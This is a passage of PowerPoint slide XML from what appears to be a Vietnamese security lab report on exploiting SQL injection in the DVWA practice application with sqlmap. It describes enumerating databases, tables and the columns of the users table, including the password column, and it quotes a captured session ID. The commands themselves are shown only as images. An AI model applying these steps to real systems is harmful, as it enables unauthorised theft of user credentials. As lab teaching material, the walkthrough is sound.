        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79BC79BE-3457-F7C6-D80E-34B65A40312D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1651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tin PHPSESSID thu được là PHPSESSID=4fa7e92ba4c7c531f986c1c8f02eae03</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F60C6404-7660-F6B4-F5ED-3F1A0A982D1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="71563" y="1193609"/>
            <a:ext cx="8914105" cy="4254691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35755437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F0817-B2ED-2C1C-099A-F4F9CAD6C39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E612CA-7169-BC7F-7531-FB06276F056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3C229DB9-6B7C-6E21-698A-F3EE9F693641}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="298037"/>
            <a:ext cx="9029700" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>3.3.1.3.	Khai thác Lỗ hổng SQL Injection (SQLi)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D036F1C-9933-98B0-BC10-BF381E705FD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118</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAA78152-F695-F3CC-9F74-8324F2D06222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1736849"/>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Trích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xuất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sử dụng sqlmap để tự động dò tìm và trích xuất danh sách các database (Cơ sở dữ liệu) có sẵn trên Webserver mục tiêu DVWA. Sử dụng lệnh:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42FAD15E-B826-D431-764E-89202B4C8EE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="422207" y="3451181"/>
            <a:ext cx="8264593" cy="2000271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26134354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E5B4E-EA77-8255-E1D9-CA905BACF43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4B0E759-958C-4F13-006F-D8B8EC76D0C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D9F3CB7D-FCF1-AE05-BF84-7A39C36E1CD5}"/>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119</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB688AA7-ECBC-2146-6FC1-9ABF5A3415A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="598804" y="165123"/>
            <a:ext cx="7956550" cy="5518907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27828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4251-3031-693B-8D54-0CB77C7153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7A0150F-F520-3168-CEB2-6B4FB6A6FB61}"/>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D7BEB566-6150-09E4-7A81-4E7B22E74E0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Mô</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>hình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> bao </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>gồm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>giai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>đoạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>cốt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>lõi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E18968F-54EE-ED36-8275-CE0F29361FC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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9675CFB-E775-53D6-9C17-9BB66D4FF19E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="1638300"/>
            <a:ext cx="8229600" cy="251607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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Delivery (Phân phối): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Truyền tải vũ khí tấn công đến nạn nhân (qua email lừa đảo, trang web bị xâm nhập).</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4. Exploitation (Khai thác): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Khai thác lỗ hổng để giành quyền kiểm soát hệ thống.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6245809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52E89-25EE-A42F-3C3D-48A4F26CD28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F7E859D-0518-49C7-F3C9-9CC46B3E85E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86A9991B-FA8B-171F-3BED-78B30020354B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="298037"/>
            <a:ext cx="9029700" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>3.3.1.3.	K hai thác Lỗ hổng SQL Injection (SQLi)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3CC741E-9FBE-17A0-E9B2-E5729A7FE9F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120</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F1EA5B1-620F-4C1C-FA4A-CEBB9A925375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="371475" y="0"/>
            <a:ext cx="8401050" cy="5721625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17414282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E324-ACFE-15CB-8970-433E1C0FECD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B29CC38-9790-CFF5-4AB5-78A175C521A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298CAE2-E5CB-2D40-E123-61E89BDD4BE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121</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FE4FC91-2A77-2680-B229-CC60215D8476}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Liệt kê các bảng:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Đây là bước tiếp nối quá trình khai thác bằng cách liệt kê các bảng (tables) trong database dvwa đã được xác định ở bước trước</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Trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Terminal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ABECCF3-B82A-F4C7-0920-A59DD9366071}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="144305" y="2552700"/>
            <a:ext cx="8999695" cy="2054405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13636937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98C16-4265-FEEC-9774-D34052F7295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E2339E-9FCA-2401-A8AC-32D8A41936E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B1E2CBEE-51E9-9AF0-08C6-71ED50ADDB5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122</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7AD8DC8-7BC9-F4EA-1A93-349FE911D6BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Quá trình này đã thành công liệt kê 2 bảng (tables) trong database dvwa: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>guestbook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EE86318-3D0A-BE9E-8080-89E0B3848F77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="1179955"/>
            <a:ext cx="7086600" cy="4535045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23057006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D5B77-AD80-F547-8F07-6683077412D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A1ABD72-659D-1D18-8ECC-CF33DC1D15C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758E36D-02DC-9027-FB8F-D2A03C1290A3}"/>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123</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5236BB80-B818-F9D0-A917-806FD73A7C4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>
            <a:ext cx="8915400" cy="1592743"/>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L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>iệt kê các cột</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Đây là bước đánh dấu giai đoạn cuối cùng trong việc lập bản đồ cấu trúc cơ sở dữ liệu trước</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> terminal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07F18C3D-15E3-3A52-FFB4-2110A1D84DC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1969114"/>
            <a:ext cx="8856670" cy="1726571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5580568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1734F-5EA3-7CD4-F74B-8BD52EAF55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4E28509-02BC-0748-6A43-220366050EF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9B3B0D7-68E4-D8F3-3BAF-8F0955DF2E0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124</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E06C76B7-FD58-5E5D-EAB1-6C6EA3883794}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>iệt kê được 6 cột trong bảng users: user, avatar, first_name, last_name, password và user_id</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A392ABD9-D801-8E6F-D4F4-A973FB2A8504}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257300" y="1240374"/>
            <a:ext cx="6629400" cy="4668239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22017769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33DF7-8DFF-9C08-B10F-40507C20801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9FC86A-6A33-7BAB-BE61-F9962D9F9F4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4637DD97-2C6D-8180-94A1-54E090D0A0E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125</a:t>
            </a:fld>
